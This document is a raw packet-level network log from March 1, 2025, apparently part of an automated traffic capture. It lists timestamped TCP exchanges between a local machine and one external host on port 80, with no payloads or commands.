Mar 1, 2025 14:42:23.592175961 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592184067 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592195034 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592195034 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592206955 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592222929 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592226982 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592236042 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592240095 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592248917 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592259884 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592271090 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592283010 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592283010 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592293978 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592307091 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592312098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592319965 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592330933 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592331886 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592344999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592355967 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592355967 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592369080 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592380047 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592381954 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592394114 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592406034 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592406034 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592418909 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592431068 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592431068 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.592451096 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.592478037 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.610408068 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628266096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628278971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628290892 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628350019 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628412008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628428936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628442049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628447056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628457069 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628463030 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628468990 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628479958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628489971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628499985 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628510952 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628516912 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628516912 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628516912 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628530025 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628537893 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628540993 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628544092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628555059 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628560066 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628571987 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628583908 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628587008 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628597975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628611088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628616095 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628623962 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628633976 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628638029 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628644943 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628650904 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628657103 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628670931 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628679037 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628696918 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628710985 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628715038 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628727913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628736973 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628740072 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628751040 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628762960 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628771067 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628774881 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628788948 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628791094 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628802061 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628813982 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628818989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628825903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628832102 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628838062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628843069 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628849983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628861904 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628875971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628886938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628894091 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628899097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628910065 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.628926992 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.628941059 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.675760984 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.684853077 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685009956 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685024023 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685036898 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685049057 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685055017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685086012 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685163021 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685173988 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685190916 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685203075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685203075 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685214996 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685226917 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685230970 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685240030 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685251951 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685256958 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685276031 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685300112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685311079 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685323000 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685340881 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685355902 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685481071 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685492039 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685503006 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685514927 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685528994 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685528994 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685540915 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685564995 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685594082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685628891 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685638905 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685650110 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685662031 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685672998 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685681105 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685684919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685695887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685702085 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685708046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685719013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685726881 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685745955 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685939074 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685950041 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685962915 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685972929 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685975075 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.685985088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.685996056 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686003923 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686017036 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686027050 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686039925 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686042070 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686065912 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686084986 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686101913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686115026 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686126947 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686137915 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686151028 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686182976 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686283112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686295986 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686306000 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686317921 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686332941 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686359882 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686434984 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686445951 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686456919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686467886 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686480045 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686486959 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686515093 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686600924 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686614037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686625004 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686635017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686640978 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686646938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686659098 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686661005 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686688900 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686752081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686763048 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686775923 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686788082 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686791897 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686799049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686810970 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686819077 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686822891 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686835051 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.686851978 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.686865091 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.687064886 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687076092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687088013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687098980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687102079 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.687110901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687122107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687129021 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.687133074 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.687154055 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.687167883 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.687377930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.693309069 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.722767115 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722781897 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722795010 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722852945 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.722897053 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.722909927 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722923040 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722937107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722949028 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.722965002 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.722989082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723067999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723079920 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723092079 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723104954 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723123074 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723138094 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723233938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723244905 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723257065 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723267078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723278046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723294020 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723337889 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723393917 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723407030 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723418951 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723429918 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723436117 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723442078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723453999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723463058 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723464966 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723478079 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723489046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723494053 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723505020 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723534107 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723550081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723715067 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723726034 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723737955 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723754883 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723773956 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723872900 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723885059 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723898888 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723908901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723920107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723932981 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723934889 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723943949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.723959923 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.723985910 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.724014044 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724025965 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724035978 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724047899 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724054098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.724060059 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724071026 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724076033 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.724082947 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724102020 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.724137068 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.724313021 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724325895 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724337101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.724363089 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.769506931 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.777774096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777787924 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777797937 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777811050 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777853012 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.777885914 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.777919054 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777930975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777941942 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777954102 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777966022 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777975082 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.777983904 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.777987957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778001070 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778007984 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778009892 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778048038 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778058052 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778069019 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778069973 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778081894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778093100 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778121948 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778260946 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778275013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778285980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778297901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778307915 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778318882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778332949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778337002 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778343916 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778356075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778362989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778377056 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778405905 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778418064 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778424025 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778477907 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778589964 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778600931 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778613091 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778626919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778647900 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778656960 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778666019 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778671980 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778676033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778742075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778753996 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778764963 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778776884 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778779984 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778779984 CET	49704	80	192.168.2.8	45.144.214.104
